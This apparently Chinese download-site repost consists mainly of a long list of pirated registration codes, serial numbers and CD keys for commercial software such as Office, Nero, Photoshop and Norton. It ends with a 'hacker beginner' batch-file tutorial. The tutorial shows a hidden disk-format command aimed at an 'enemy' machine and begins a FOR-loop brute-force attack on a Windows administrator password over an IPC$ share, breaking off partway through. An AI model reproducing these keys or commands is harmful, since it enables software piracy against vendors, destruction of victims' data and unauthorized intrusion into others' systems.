注册表维护大师2004.1 用户名 yzez ID 9999999999 序列号 12345678 注册码 LIONKNKNKLLDOJD
极速火龙CD压缩器V2.25 注册码 12345678-23456789-C1BC81D9-C6D864AA
多功能日历v4.9 序列号:SOFT88888 注册码:JDLEE12-897JKQR-PYTSCAL
系统优化大师2004Build01.25 Name:34520 Code:3452036k4x804zf7836&
3TV宽带卫星网络电视机v3.0 3TVKEY-P89V-4308-NYSS 3TVKEY-HBR6-7786-QWPD
开心辞典2004build01.25 订单号 34520 注册码 11036k4x804zf7836$
屏幕间谍2003V8.4 用户名 ljwbh 注册码 64416-150449
Delphi学习宝典v1.8 用户名 learndelphi.yeah.net 注册码 789789789789789
中华灯谜XP2004Build02.01 订单号 123456 注册码 37236l5u412~f1449^
电脑伴侣V1.90Build0120春节版 注册名 农海斌 注册码 1154211829056515276
汉语宝典Pro2004Build02.05 区域 福建 用户名 crsky 注册码 BCA6BBAE64757B6370
豪杰解霸V8网络版 Name crsky Code uqq1-91ja-9sq7-s3s5
魔法转换v3.1 用户名 Jacky [REVENGE] 注册码 MC35101A8A86A3A
友情强档v7.61XP 注册名 赢政天下 注册码 DB45F189CB66B45D4B88ED5E66F364C7
光碟工坊V2.6.1.19简中版 Name crsky Company www.crsky.com Code CMA8EA9F77HE8
轻松提取资源v1.87 Name 林逸凡 Code 7322122
日语五十音图v3.4 用户名 李逍遥 号码 720221 注册码 1255440758
汉语宝典Pro2004Build02.27 区域 福建 用户名 crsky 注册码 BCA6BBAE64757B6370
UltraISO6.56SR-1简中版 Name crsky Code 2A0E-1C36-0095-006C
海月图片猎手v1.55Build40224 Name yifan Code 011671
搜索引擎工厂v2.0 Name yifan Code 138571
汉语宝典ProBuild20040303 区域 福建 用户名 crsky 注册码 BCA6BBAE64757B6370
反黑精英v2.31 用户名 crsky[BCG] 序列号 DBuXU807DOasJESX4aakz0di
忘忧草v4.0Build0310 Name crsky Code ATS@WYC6-V35B0310-VC6w2k@7-CD@8-crsky
海啸录音机v2.2 name dongzefeng[YCG][DFCG] code 2435634335111814913
填词大亨v3.2 Name crsky Code FGTRE-DWFR6676HW-TT7FS
注册表医生v2.96 用户名 @ fly @ 注册码 50E8C-2D4BC-92135-20040-03080-24689-2DB
豪杰解霸DVDIIIv3.03 Name crsky Code 3319-233u-kl35-p9g3
汉语宝典ProBuild20040312 区域 福建 用户名 crsky 注册码 BCA6BBAE64757B6370
Delphi学习宝典v2.0 用户名 ljwbh 注册码 434622957
诗词快车2004.3.25 用户名 随便填 注册码 FGTEE-DWFR6676HW-TT7FS
神算刘半仙2004Build03.20 Name 2034520 Code 12436k5u909zf1112
UltraISO6.56SR-2简中版 Name crsky Code 499B-3836-B877-C4D4
XP变脸王v5.31 序列号 XSHLS5110001 注册码 BC57C-05678-0367C-FB722-FD8BC
反黑精英v2.40 用户名 crsky[BCG] 序列号 DBuXU807DOasJESX4aakz0di
系统优化大师2004Build04.01 Name 2034520 Code 7215136k5u909zf1112&
快捷反垃圾邮件v2.0 Name crsky Code KJAS100-5CA88-3CE30-37629
反黑精英v2.50 用户名 crsky[BCG] 序列号 DBuXU807DOasJESX4aakz0di
注册表医生V2.98 用户名:@ fly @ 注册码:50E8C-2D4BC-92135-20040-03080-24689-2DB
桌面秀V2.0 注册名 YANNIC 注册码 21942888
迷你歌词v2.5.208 Name www.crsky.com Code 56454DB301GGGF1F
木马克星V5.46Build0401 用户名:xylxw 注册码:1942590203 用户名:masld 注册码:985422760 用户名:xylx 注
册码:1029143501
注册表维护大师v2004.4 姓名 yyxk 软件ID 1234567890 软件序列号 12345678 软件注册码 LOOEIDOKLLMDOJD
反黑精英v2.51 用户名 crsky[BCG] 序列号 DBuXU807DOasJESX4aakz0di
光碟工坊v2.6.46 Name crsky Company www.crsky.com Code CMA70E3622P77
汉语宝典ProB20040414 区域 福建 用户名 crsky 注册码 BCA6BBAE64757B6370
2004中高考制胜宝典v2.0 注册码 wp28-qxt3-r9mv-h68b
FLASH MX2004 非常好的一款做FLASH工具
WPD700-51709-34594-83503
WPD700-51709-34594-83503
WPD700-52004-41494-56531
会声会影(Ulead Video Studio) V7.1 简体中文零售版
SN:111A2-87000-00000007
XP变脸王 V5.31版注册码
序列号:XSHLS5110001
注册码:BC57C-05678-0367C-FB722-FD8BC
XP界面仿真器 v5.8
参考注册信息:
用户名:suoxinliang[OCN]
注册码:50D877B1DC254DC0218E2498A3E3686
XP界面仿真器 V5.9 6.0破解版
注册信息:
序列号:xinko.com
注册码:50D877B1DC254DC0218E2498A3E36862
XP界面仿真器 V6.1 注册版
Name:arongsoft
Code:816586C0E7BE1DC98876912C3599C
V6.11版
用户名:chinesejia
注册码:5298848796B0EB3E
Name:crsky
Code:512239947B2ED2B8
Opera For Windows V7.20 Final 中文汉化正式版
Code:w-vsvJt-RLFCk-tKaTr-FMCkH-ki3kJ
阿达自动定时关机器 V5.60 + 注册码
用户名:test
注册码:KCfplbqfcnni3''^]kk#(*'!aWf
adapopman
注册码:e_V_E]fGEbnmi2'&^\kj#'*&!`We
屏保蝴蝶花园
注册资料:
Name : Tom McConnell
Personal Info: wsinvestments@bazarov.net
Serial Number:GG8SS-WHSFM-FA5QW-UFFF8-WJR5B
黑客字典二
Name:Banyet
Code:O8G22M
win xp4.79注册信息:
name:tiansha.net
key:AED5C-IFMD6-VGZA8-BVEU2
ZoneAlarm Pro v4.5.530.0
Code:f1qif-ivffu-kux90-717da6-sm3cu0
网页制作三剑客WPD700-52600-25294-53051
SuperCleaner v2.57汉化完美版
Name:crsky
Code:746-28912-616-7784 name:downbest code:1174-45240-966-12180
动感金鱼极品屏保 V1.0 注册版
注册码:25ahb-2v3t2-2kw3m-nnhfq
windvd5
eMail:crsky@163.com Password:crsky Key:VY5Y8T2V-AVSG7HVW-U6G7ZJ5K-9WHU8XZN2 Card:5888
eMail:web@crsky.com Password:yifan Key:5JU4U9DL-X9TYHND8-YVGZHFR5-WYGPNHFV2 Card:1595
SuperCleaner V2.57 注册版
Name:cehgx Code:717-27404-587-7378
PartitionMagic v8.02 Retail 零售版 -分区魔法师
Name:www.ttdown.com
Company:www.ttdown.com
SNM800EN1-11111111
Web Translator 3.20
name:downbest.net
code:CWTW2010011-646F776E626573742E6E6574
Magic Translator v4.00
Name:crsky
Code:CMTW207782-6372736B79
瑞星网络防火墙
产品序列号:52LDJG-Q9LBCT-6ACQS2-R35200
用户ID:4AJRY64DNA4G
Teleport Pro V1.29 Build 1995 破解版
注册信息:
name:tiansha.net
code:1825298124
System Mechanic v4.0c 汉化版
Name:sifei
Code:75638-P4751-3606754515
心理测试小精灵 V3.5
Name:李逍遥
Code:008875441806
REAL格式文件压缩至尊 v2.60
name:crsky
eMail:crsky@163.com
Code:90B9-1288C
IconDIY v3.0 汉化版
Name:crsky
Code:AEJNC250E088
The Cleaner Pro v4.0 Build 4138
Name:crsky
Code:35BB-C72E-0899-8ACA
Winamp v5.0 绿色汉化版
Name:crsky
Code:QJHCH-USZ3H-SRPWJ-PNMRE
PC Security v6.2 特别版
Name:crksy
Code:E4MG6E0VLL0FP1ER
绿鹰PC万能精灵 v2.87
Name:eghostuser00002050
Code:Ht5rvEEEjBYVV7B7KV
PowerDVD v5.0 MULTILANGUAGE
S/N:BX36M15491914915
WinDVD Platinum v5.3.5.20
eMail:web@crsky.com
Password:crsky
Key:VV3QY3UD-F我的偶像6PHV5-6K3KRZKY-Y7VJ8SJJ2
Card:8883
豪杰解霸(DVD Hero DVD Player) III V3.02
注册名:arong
注册码:s3m9-24gv-kpay-qmgi
还原精灵 2004 V5.5 单机零售版
Code:YUAN-VRT6-SAPT-MQES-XFAY
1st极品网络电视电影 II 14.7 破解
用户名:中国破解联盟
sn:187857758 55957207 134842860
魔法转换 V3.0
Name: Sponge Uk
Registration Code: MC35971C2E0684400000000
SeaStorm 3D(海洋风暴仿真屏保) V1.5 注册版
Name:Heiihome
Code:SRKM-U4NHUQTTKMZQ-XDHC
SuperCleaner 2.67汉化破解版
name:tiansha.net
code:1535-58084-1249-15638
TechSmith SnagIt v7.03 汉化版
Name:crsky
Code:A2A123F0C4C6C07263
Delphi学习宝典 V1.8
用户名:learndelphi.yeah.net
注册码:789789789789789
绿鹰2.87注册码:
用户名:eghostuser00002050
注册码:Ht5rvEEEjBYVV7B7KV
趋势科技网络安全个人版 11
SN:OSJF-9999-6388-8759-0082
[NextPage]
PopUpCop V2.0.3.20 注册版(广告过滤)
Name:arongsoft.com
Code:3B4HC3L100MBBL1
Norton systemworks2004
VKHF-37P2-YBB2-FQ9B-Q4PB-D7HD
VGHC-2P9V-3BB2-FCC6-CB2W-VJ7R
VWH4-4HKH-VBB2-FK7F-C2MM-PQ7J
Throttle v6.2.25.2004
Name:crsky
Code:3437287005306440+4+60554
RM电影修复专家 2002 v2.0
注册版h2coEOyb8X
TuneUp Utilities2004
参考注册码:
Name:www.gupin.com
company:www.gupin.com
serial:5SMGN-JM2HA-JSJ8M-AXYSQ-DERCT-7JSKW
Name: Black Killer
Company: cs-skin.de.vu
Code: GPDTJ-P9178-TWEP6-1DXCQ-U797C-FDUU3
Dreamweaver UltraDev 4.0 正式版
UDW400-06066-07241-71420
Macromedia Fireworks v4.0
FWW400-02666-67248-02548
Macromedia Flash 5.0
FLW500-03143-77238-80660
Macromedia Flash 5 Generator 2 Developer Upgrade(27M)
sn:GDW200-01187-77282-94456
Macromedia FreeHand 9.02(24M)
sn:FHW900-00010-47278-88947
Macromedia Freehand 10(18.2M)
SN:FHW100-00654-47258-19356
MagicWin 1.3f
注册码:Name:tiger Number:1234567 Code:123HJLJ544
nero 4.0.7.5
1404-1000-0564-0564-7701
NERO BURNING ROM V5.0.1.3
codd:1777-7601-5747-1969-5122-1617
S/N: 1500-0001-0092-0227-9281-4716
Nero 5.0.4.8官方汉化完全版 5336KB
S/N:1500-0001-0092-0227-9281-4716
Code:160475-231795-241879-200834
nero 5.5
注册码:1500-2001-0027-0223-4909-7169
Nero 5.5.1.8 正式版
sn:1500-2003-0025-0225-3006-9865
Nero.Burning.ROM.v5.5.6.4
sn:1502-0001-0000-0484-5609-9425
NetCaptor 6.5
sn:CMpJ5rWHS4CNe+xtL9x6jsDfxWTlZ7BRWUjHHYYWcdC
UsB3BGoqbF3=xOfC2qKIqi3yLY3pCuh80iYqNi4lGoj
wvwG46dDVtdwz908WbApcFn=vkwrWnqaIcd42SOjKrV
4KYDJPyi2Ft8YC6zL5LVARG7AWNKplNMWFSSC3QFJk
NetXray3.03商业版
注册码:1D-00000011-PPAZBk
MP3 CD Maker v1.1x Name: ReanimatoR^LasH S/n: THGIL-6ED9
MP3 CD Maker v1.19 Name: Walhalla/oDT S/n: 4589355892 or Name: CZY S/n: 1234562890
MP3 CD Maker v1.17 Name: Walhalla/oDT S/n: 4589355892 or Name: CZY S/n: 1234562890
MP3 CD Maker v1.16 Name: ReanimatoR^LasH S/n: THGIL-6ED9 or Name: Gordon S/n: 1234566899
MP3 CD Maker v1.0 Name: wolf S/n: THGIL-2ED8
Norton AntiVirus 2000 简体中文精简版
Cd-Key :RBDC9-VTRC8-D7972-J97JY-PRVMG
Office 2000
J2MV9-JYYQ6-JM44K-QMYTH-8RB2W
office xp
FM9FY TMF7Q KCKCT V9T29 TBBBG
office xp中文版
BMV8D-G272X-MHMXW-4DY9G-M8YTQ
BYGJ9 Y34G6 36CPG 6QMF2 Y8DRY(30天中文试用版)
P2KDC-9HMXH-9QFVK-PMQCB-V2XMM
BlackICE Defender(黑冰) 注册码:824890-RS-D4D08
巴特拉图标战士 v1.1(BIG5版) 注册码:0327-3769-a500
北信源杀毒专家VRV2001 序列号:FJDLKICPEAE
ChinaZip(中华压缩)7.0 用户名:TonyLiang 注册码:AG5104
CPU Cool v6.1.1 Code:7398356
CPUCool V6.0.0 Beta sn:4337148
登录奇兵 V4.0正式版 用户名:CHINA 注册码:PD37ZFRZ5B39或者用户名:伪装者 注册码:P43DM1GHRYK3
Delphi6 注册码:z9j8-pum4n-c6gzq 认证码:rw2-7jw
DialWatcher(拨号管家)3.7 Pro 用户名:gfh 公司名:CCG 注册码:3395-134136或者用户名:lryu 公司名:yansan 注
册码:4600-310576
电脑播音员3.0 SN:1949101
电脑幽灵(pcGhost) V4.10 sn:123243253244253147014
Drive Imager DriveStar 2.25 Name:UNREGISTERED! CodeS1-E3B5N-ED81U-BB7D
Dreamweaver 4.0 完全正式版 安装授权号:DWW400-03771-57289-73501
Dreamweaver UltraDev 4.0 安装授权号: UDW400-06066-07241-71420
DreamWeaver3.0 注册码:DWW300-08610-27280-95766
Fireworks 4.0 完全正式版 安装授权号:FWW400-02666-67248-02548
Flash 5.0 最终正式版 序列号FLW500-13547-37838-54321 或者 FLW500-03143-77238-80660
Frontpage2000 简体中文正式版 序列号:K3KT9-267PT-4THHF-Q69R3-FRXY6
或者 J2MV9-JYYQ6-JM44K-QMYTH-8RB2W
或者 00120804-78E1-11D2-B60F-006097C998E7
FlashGet网际快车0.96 广告破解 姓名FLASHGET 注册码:22029EC2M7
呼吸小秘书主页特效1.2版注册码 注册名:随便写(当然也可以是你的名字)万能注册码:BSJG08SN01234或
BSJG08SN08888
用户名:bazao 注册号:BSJG08SN12681
呼吸小秘书 GIF 制作万能注册码 注册名:随便写(当然也可以是你的名字)万能注册码:BSXMSREG00123或
BSXMSREG00888
用户名:bazao 注册号:BSXMSREG11767
美萍反黄专家V2.51 序列号:WR-911 注册码:43403 或者 序列号:88888888 注册码:35355
Office XP CD-KEY:BMV8D-G272X-MHMXW-4DY9G-M8YTQ 或 P2KDC-9HMXH-9QFVK-PMQCB-V2XMM
Office 2000 CD-KEY:J2MV9-JYYQ6-JM44K-QMYTH-8RB2W
Photoshop6.0 pww600r7105467-948或者EXX600B6311279-428
Photoshop5.0 PWC502R7100237-374
天网防火墙个人版 用户名:copyyour 注册码:0549
Update Now2000 注册名:dyiyd 注册号:28f9fd969586 或
注册名:无耻的人写的狗屎软件 注册码:949241522547
Winzip 8.0(7.0) name: x s/n: 00020000 (或 Name:faey2000 S/n:986C06BE)
WPS Office KSW026-110000-428123-807600
万能五笔2000+通用注册码 用户名:shenwei168 PASSWORD: 十六个任意数字
万能五笔注册码 用户名:cniti 用户码:3821-076433-0764
文件密使2.6 用户名:亮丽软件 注册码:53841
虚拟光驱(Virtual Drive)2001个人版 安装序列号:FSX31000000
侠客系统修改器(版本1.21) 注册名:wenling 注册码:b2Wt23W0x3X2v2 或者
用户名:伪装者 注册码:q4Uxz4Uwx6U7
侠客系统修改器 v1.2 注册名:opq98 注册码:33W451Wlk1
智能陈桥五笔5.03正式版 注册信息码:CCJXQ7X5S
兔子魔法设置顺序号:
name:byms411724
sn:mscnc-xeyyi-LUiLd-aUjgr-kbrpp
豪杰解霸3000英雄版
注册名:crsky
注册码:3319-13ns-173t-x5u1
豪杰解霸 V8网络版
Name:crsky
Code:uqq1-91ja-9sq7-s3s5
豪杰解霸3000英雄版 2004.02.24
用户名: www.downle.com
注册码:95u1-sidh-5d17-r3xr
豪杰解霸V8ISO原版光盘零售版
注册名:M59AJ8GQMR
注册码:7N1C-5HU5-WPE5-5AQ3
豪杰解霸V8注册码
注册名:M59AJ8GQMR
注册码:7N1C-5HU5-WPE5-5AQ3
ACDsee 6.0 注册码
678-157-793-560-487-541
904-692-376-270-487-541
金山快译2003专业版注册码(安装序列号)
055100-110000-835474-719351
我形我速 4.0
我形我素4的全彩数码影印中心专用版,是在原我形我速4的基础上,针对Full Colors系列纸增加了大量模板,设计后
直接在Full Colors系列纸上直接打印各类贴纸和贺卡等!
SN:12903-54000-87045955
反黑客木马专家 2003 Build 1.6
注册信箱:leexoyo@cschina.org
注册码40BEA-62051-A2516-9825C-3C2ED
木马终结者V 2.1
姓名:ttian 注册码:416709
兔子魔法设置6.01注册码
序列号1:SRMST16868-SQMNOSOFROYA
序列号2:SRMST53725-DYEFGUFFCYAA
序列号3:SRMST53725-DYEFGUFFCYAV
序列号4:SRMST52343-OFXYAXHCQNGG
软件名:网际快车v1.60 (注意把版本带上)
用户名:任意
E-mail:任意
注册码:fgc-k770z766j00nl830c266l023c516l354x780x780
兔子魔法设置v6.01
用户名:(随便填)
序列号:SRMST53725-DYEFGUFFCYAV(本人试过,可以注册)
序列号:SRMST16868-SQMNOSOFROYQ(本人试过,可以注册)
注册码:SRMST52343-OFXYAXHCQNGG(本人试过,可以注册)
注册码:SRMST53725-DYEFGUFFCYAA(本人试过,可以注册)
豪杰音频通2.5
Name:crsky
Code:3319-iqw3-z539-t3g3
豪杰---V8
注册名:crsky
注册码:3319-13ns-173t-x5u1
注册名:TLF
注册码:5911-91p3-jq13-197u
金山词霸:
055000-110000-118594-630207
055000-110000-856410-465590
金山快译2003:
055100-110000-147526-553361
金山游侠V
055900-110000-970028-301009
终级上网提速 V5.6
BA988B2554557F46
WINISO53
注册名:Jim Jia
注册码:311FB9003A8A9E0E92F08FF487297B485E45F124D9DD0D84
黄金内存
ID:6215-360606-10069
ID:8843-150613-13458
ACDSEE5.01
ID:664-888-115-300-030-541
豪杰视频通(Hero Video Convert) v2.0.7 多国语言
Name:crsky
Code:3319-439y-31bq-39l3
Nero Burning Rom v6.3.1.6官方简体中文版
ID:1A23-0006-7130-1234-5678-4475
My IP Suite v5.0 英文
Name:crsky
Code:F41CB34A4B35A5D75E08886F9BB42753
The Cleaner Pro v4.0 Build 4138 英文
Name:crsky
Code:35BB-C72E-0899-8ACA
NeroVision Express v2.1.0.3 简体中文
Code:1A23-5174-5038-8093-5850-9261
Nero Media Player v1.4.0.16 简体中文
Code:1A23-4186-6038-7133-6248-5706
兔子魔法设置2004 注册版
S/N:SRMST68168-AOLDWJKLHYJ 勿在线更新升级 参考注册信息:
用户名:[光盘版]
序列号: SRMST68533-QXFGHTHKGDS ,SRMST56414-QPMGJTUVKPD
安装后,先输入用户名:[光盘版] 然后输入注册码,别怕位数不正确,你输入试试,会自动变成上面的两格!变成两
格就好。
GameJack v4.00.506 注册版 英文
Name:piaodown.com
Serial:42S00-GJK7D-4BBB9-F3609-E302Y
神算刘半仙 V2003 Build 12.15 注册版
Name:34520
Code:1436k4x804zf78364
启动易EasyBoot V4.55 简体中文
注册码:35E0-CED1-6F91-32F0
Name:crsky
Code:4722-2312-1D04-66DD
Zealot All Video Splitter v1.10 英文
Name:piaodown
Code:5A72FC72B5F34FD173122076EAB52D
FinePrint Enterprise Edition v5.10 汉化版
Code:CZ6L-F526-SEYE
QuickTime v6.40 汉化版
Name:crsky
Company:www.crsky.com
Code:GRG6-3WNG-3GW4-QYXY-8734
圆方家居设计 3合1零售版
序列号THWL-K9MJE-83DEJ-RHYP5
迷你歌词(MiniLyrics) V2.4.196
请离线注册--
Name:downbest.net
Code:434E7F0701PSQSPF
Selteco Menu Maker v3.082 英文
Code:037007-110765926 or 937901-SMMK-319968928
Winamp v5.0 RC666 汉化版
Name:crsky
Code:ZM8C0-11UAA-PT0CA-VE9Y8
KoolMoves Flash Editor v4.2.5 英文完全版
Name:www.ttdown.com
Code:45hTBAP
ImTOO DVD Audio Ripper v1.0.11 英文
Name:www.ttdown.com
Code:105709011656271581615FB6-A228-409A-CD9C
高清晰中外卫星电视直播器 2004 注册信息
通用注册码:webtv
WinXP Manager V4.8.0.4 注册版
Name:arongsoft
Code:5GQO1-DHJI6-F30UM-Q87DQ
Blindwrite Suite 5.0.3 多国语言
Code:IL06-B577-B9H3-7LFJ
Code:BX1L-NA7X-5DFW-5LFJ
虚拟光驱(Virtual Drive) Personal V8.0 零售版 多国语言
Name:arong
S/N:VDP80001503905207322
虚拟光盘制作CloneCD 4.0.1.6
Serials: 686625720-2-2155886563-3763167649
Name: 9Down
Site Translator v2.2 英文
Name:www.skkk.net
Code:10DB735475736FB44B38
Alt-N MDaemon Pro v7.001 汉化版
Name:www.skkk.net
Company:www.skkk.net
Code:KIELFLE-GNHRLUD-DRHYCOM
SMS-it v3.1.4 -手机短信发送工具
Name:www.skkk.net
Code:B0A9CC738B9B96939A8584797B828F9890788C76
兔子6.02注册码
用户名:1987654321
转自:红色黑客联盟
[分享] 黑鹰易语言培训课程 [ 07.26更新完毕 ] [35课] [ 翻录版本,免key ]
黑客入门基础知识--简明批处理教程
| 批处理命令如果运用得当,威力强大无人能敌!是不是想学习了呢,从今天我将把批处理的常用命令陆续的介绍给大家,如果大家有什么不懂的地方,可以写下评论: 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。 一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> )结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都 以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串" 待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名 待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字 待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2 DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [[drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN ('command') DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=;;; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或 'Z' 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f 